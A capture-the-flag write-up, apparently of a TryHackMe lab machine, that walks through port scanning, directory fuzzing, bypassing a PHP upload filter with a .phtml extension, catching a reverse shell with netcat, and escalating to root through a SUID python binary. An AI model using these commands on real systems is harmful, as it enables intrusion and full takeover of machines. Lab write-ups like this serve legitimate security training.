![[Pasted image 20250629130650.png]]

# Information Gathering - Nmap

Scanning all 65,535 TCP ports found 2 open ports: 22 and 80.

```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ sudo nmap -sS $IP -Pn -n --open --min-rate 3000 -p-
[sudo] password for parallels:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-29 12:35 CDT
Nmap scan report for 10.10.225.13
Host is up (0.13s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 23.14 seconds
```

I ran another scan, this time with the `-sC` and `-sV` options, for more detailed information about those 2 open ports.

```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ nmap -sC -sV $IP -p 22,80
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-29 12:36 CDT
Nmap scan report for 10.10.225.13
Host is up (0.13s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 4a:b9:16:08:84:c2:54:48:ba:5c:fd:3f:22:5f:22:14 (RSA)
|   256 a9:a6:86:e8:ec:96:c3:f0:03:cd:16:d5:49:73:d0:82 (ECDSA)
|_  256 22:f6:b5:a6:54:d9:78:7c:26:03:5a:95:f3:f9:df:cd (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: HackIT - Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.76 seconds
```

Lastly, I performed a UDP scan against the top 1,000 ports but found no open ports.

```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ nmap -sU $IP --min-rate 3000 --top-ports 1000
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-29 12:38 CDT
Nmap scan report for 10.10.225.13
Host is up (0.13s latency).
Not shown: 994 open|filtered udp ports (no-response)
PORT      STATE  SERVICE
207/udp   closed at-7
1059/udp  closed nimreg
19541/udp closed jcp
21902/udp closed unknown
49194/udp closed unknown
62699/udp closed unknown

Nmap done: 1 IP address (1 host up) scanned in 1.39 seconds
```

---

# Footprinting

##### Port 80

I opened up my browser to see the web page on port 80. Below is all I saw; I couldn't find any useful information.

![[Pasted image 20250629123951.png]]

I used `ffuf` to enumerate directories, and the directory named `panel` stood out to me.

```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ ffuf -u http://$IP/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -c -ac

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.225.13/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 :: Follow redirects : false
 :: Calibration      : true
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

.htaccessZhUoKYjp       [Status: 200, Size: 616, Words: 115, Lines: 26, Duration: 131ms]
<SNIP>
uploads                 [Status: 301, Size: 314, Words: 20, Lines: 10, Duration: 239ms]
<SNIP>
css                     [Status: 301, Size: 310, Words: 20, Lines: 10, Duration: 128ms]
js                      [Status: 301, Size: 309, Words: 20, Lines: 10, Duration: 127ms]
panel                   [Status: 301, Size: 312, Words: 20, Lines: 10, Duration: 128ms]
```

The `/panel` page appears to be a place where files can be uploaded. We also discovered the `/uploads` directory with ffuf, and I suspect that files uploaded through `/panel` are stored in `/uploads`.
![[Pasted image 20250629125019.png]]

I tried uploading `Pentest Monkey`'s `php-reverse-shell.php` file, but it seems the web server does not accept `.php` files.

![[Pasted image 20250629125527.png]]

I wasn't sure how strictly file filtering was enforced for uploads at this point, so I changed the file extension from `.php` to `.phtml` and tried uploading it again -- and it worked!

![[Pasted image 20250629125750.png]]

I browsed to `/uploads` and the file we had just uploaded was there.

![[Pasted image 20250629125827.png]]

Successfully connected to the reverse shell :)

```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.23.133.183] from (UNKNOWN) [10.10.225.13] 60002
Linux rootme 4.15.0-112-generic #113-Ubuntu SMP Thu Jul 9 23:41:39 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 17:58:31 up 25 min,  0 users,  load average: 0.00, 0.01, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
```

Got the `user.txt` flag in `/var/www`.

```bash
www-data@rootme:/var/www$ cat user.txt
THM{y0...
```

---

# Privilege Escalation

To access `/root` and obtain the `root.txt` flag, I needed to elevate my privileges. I looked for files with the `SUID` bit set.

```bash
www-data@rootme:/var/www$ find / -type f -perm -4000 2>/dev/null
<SNIP>
...
/usr/bin/newuidmap
/usr/bin/newgidmap
/usr/bin/chsh
/usr/bin/python
/usr/bin/at
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/pkexec
/snap/core/8268/bin/mount
...
<SNIP>
...
/bin/mount
/bin/su
/bin/fusermount
/bin/ping
/bin/umount
```

The `/usr/bin/python` binary stood out to me: if the Python binary has the SUID bit set, I thought I could take advantage of that and easily get a shell. `gtfobins.github.io` confirmed it.

![[Pasted image 20250629130622.png]]

Got the `root.txt` flag!

```bash
www-data@rootme:/var/www$ /usr/bin/python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
# whoami
root
# cd /root
# ls
root.txt
# cat root.txt
THM{pr...
```